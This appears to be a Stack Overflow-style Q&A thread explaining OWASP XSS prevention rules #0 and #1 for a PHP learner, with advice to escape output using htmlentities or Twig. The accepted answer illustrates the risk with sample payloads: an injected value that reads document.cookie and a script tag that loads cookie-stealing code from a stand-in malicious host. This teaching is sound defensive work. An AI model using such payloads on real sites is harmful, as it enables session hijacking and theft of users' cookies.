# OWASP Cross Site Scripting rules?

Tags: php, forms, security, xss, owasp

I'm reading about XSS to educate myself on security while working with PHP. I'm referring to [this article](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet), in which they talk about XSS and some of the rules that should be adhered to.

Could someone explain Rules #0 and #1 for me? I understand some of what they are saving, but when they say untrusted data do they mean data entered by the user?

I'm working on some forms and I'm trying to adhere to these rules to prevent XSS. The thing is, I never output anything to the user once the form is complete. All I do is process data and save it to text files. I've done some client-side and a lot of server-side validation, but I can't figure out what they mean by `never insert untrusted data except in allowed locations`.

By `escaping` do they mean `closing tags - </>?`

Comment: Yes user data is untrusted data. If you never output any data on your site, you satisfy rule 0 and 1. Specifically rule one means using a function like `htmlentities` on user input

Comment: with "never insert untrusted data except in allowed locations" I think the author mean that you should always ask yourself if the data was provided by the user or not. If it was, make sure that it can do no harm to your system.

Comment: @Steve, does this mean `htmlentities` should be used server-side as well? I use a combination of `trim` and `filter_var( , FILTER_SANITIZE_STRING) for server-side validation of inputted data. Also, what happens if I output a hardcoded message that isn't sending back user input?

Comment: Any data that you're using in your application should be considered untrusted, not only user provided data. Recently, there was an XSS attack on major DNS services (mxtoolbox.com) through TXT records. MX Tool Box assumed that DNS records should be trusted, so A guy proved that you can put <script> tags in your TXT records and hack any site that parse whois output without escaping strings, like mxtoolbox.com

Answer (score 0, accepted):

Rule #0 means that you should not output data in locations of your webpage, where it's expected to run instructions.

As shown on your url, do not put user generated data inside `<script>`tags. For example, this is a no-no:

```
<script>
var usernameSpanTag = document.getElementById('username');
usernameSpanTag.innerText = "Welcome back, "+<?=$username?>+"!";
</script>
```

Looks pretty safe, right? Well, what if your $username variable contains the following values:

`""; console.log(document.cookie);//`

So, on a website what you're going to display is going to be this:

```
<script>
var usernameSpanTag = document.getElementById('username');
usernameSpanTag.innerText = "Welcome back, "+""; console.log(document.cookie);//+"!";
</script>
```

So someone can easily steal your user's cookies and elevate their privileges. Now imagine that you're using similar code to say, update which user created the latest post, and shows up via AJAX. That's a disaster waiting to happen if you do something like above (and do not sanitize the username in the first place).

Same applies for `<style>`,`<img>`, `<embed>`, `<iframe>` or any other tag that lets you run scripts or import resources. Also applies to comments. Browsers ignore comments, but some interpreters like the JSP parser handles HTML comments as template text. It doesn't ignore its contents.

Rule #1 is pretty similar tu rule #0, if you're developing web applications at some point or another you will have to output user generated data, whether it is an email address, a username, a name, or whatever.

If you're developing a forum, probably you may want to give your users some styling options for their text. Basic stuff like bold letters, underlined and italics should suffice. If you want to get fancy, you may even let your users change the font.

An easy way to do it, without too many complications, is just letting users write their own HTML if they choose to do so, so if you output HTML from your users in "safe" locations like between `<p>` tags, then that's a disaster waiting to happen as well.

Because I can write:

> Hey everybody, this is my first post `<script src="//malicioussite.io/hackingYoCookiez.js"></script>`!

If you don't escape that input, people will only see:

> Hey everybody, this is my first post`!

but your browser will also see an external javascript that tells it to send everybody's cookies to a remote location.

So always escape the data. If you're using PHP you can use `htmlentities` or use a template engine like Twig, that automatically escapes the output for you.

Comment: Thank you for the in-depth answer! I have a question about the `<script></script> tag` security issue. Does this still become a security issue if we use a separate file for Javascript functions? I do retrieve user data from a form in some of these functions, but the function is called inside of a `<input type="submit"` tag. Like so: `<input type="submit" name="submit" onClick="return function();">` Luckily it isn't sensitive user-inputted data, they are values selected from a drop down menu.

Comment: Yes, it still applies if you use a separate file for Javascript functions. Also, values in drop down menus can be altered very easily with Firebug or Chrome Web Inspector tool, you shouldn't trust those values either. Trust no one. Plus, the way your writing your javascript is obstructive. Use event listener for click event, this way your javascript will degrade gracefully if something fails. More usability issue, than security, but thought of letting you know anyways.